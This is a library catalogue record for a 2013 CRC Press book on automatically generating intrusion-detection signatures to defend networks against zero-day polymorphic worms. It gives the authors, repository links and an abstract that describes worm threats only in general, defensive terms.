Automatic defense against zero-day polymorphic worms in communication networks

Internet worms pose a major threat to Internet infrastructure security, and their destruction is truly costly. Computer Worm is a kind of malicious program that self-replicates automatically within a computer network. Worms are in general, a serious threat to computers connected to the Internet and...

Full description

Bibliographic Details
Main Authors: Mohammed, Mohssen, Pathan, Al-Sakib Khan
Format: Book
Language:English
English
Published: CRC Press, USA 2013
Subjects:
Online Access:http://irep.iium.edu.my/25812/
http://irep.iium.edu.my/25812/
http://irep.iium.edu.my/25812/1/Auto_Defense_polyworm_COVER.jpg
http://irep.iium.edu.my/25812/3/PREFACE_AuthBIO_Worm_CRC.pdf
Description
Summary:Internet worms pose a major threat to Internet infrastructure security, and their destruction is truly costly. Computer Worm is a kind of malicious program that self-replicates automatically within a computer network. Worms are in general, a serious threat to computers connected to the Internet and its proper functioning. These malicious programs can spread by exploiting low-level software defects, and can use their victims for illegitimate activities; such as corrupting data, sending unsolicited electronic mail messages, generating traffic for distributed Denial of Service (DoS) attacks, or stealing information. Today, the speed at which the worm propagates poses a serious security threat to the Internet. Polymorphic worm is a kind of worm that is able to change its payload in every infection attempt, so it can evade the Intrusion Detection Systems (IDSs), and damage data, delay the network, cause information theft, and other illegal activities that lead to even for example, high financial loss. To defend the network against the worm, intrusion detection systems (IDSs) such as Bro and Snort are commonly deployed at the edge of network and the Internet. The main principle of these IDSs is to analyze the traffic to compare it against the signatures stored in their databases. Whenever a novel worm is detected in the Internet, the common approach is that the experts from security community analyze the worm code manually and produce a signature. The signature is then distributed and each IDS updates its database with this new signature. This approach of creating signature is human intensive, very slow and when we have threats of very fast replicating worms (that take as small as few seconds to bring down the entire network) like Zero-day polymorphic worms, the need of an alternative is recognized. The alternative approach is to find a way to automatically generate signatures that are relatively faster to generate and are of acceptable good quality. This book focuses on how we can automatically generate signatures for unknown polymorphic worms.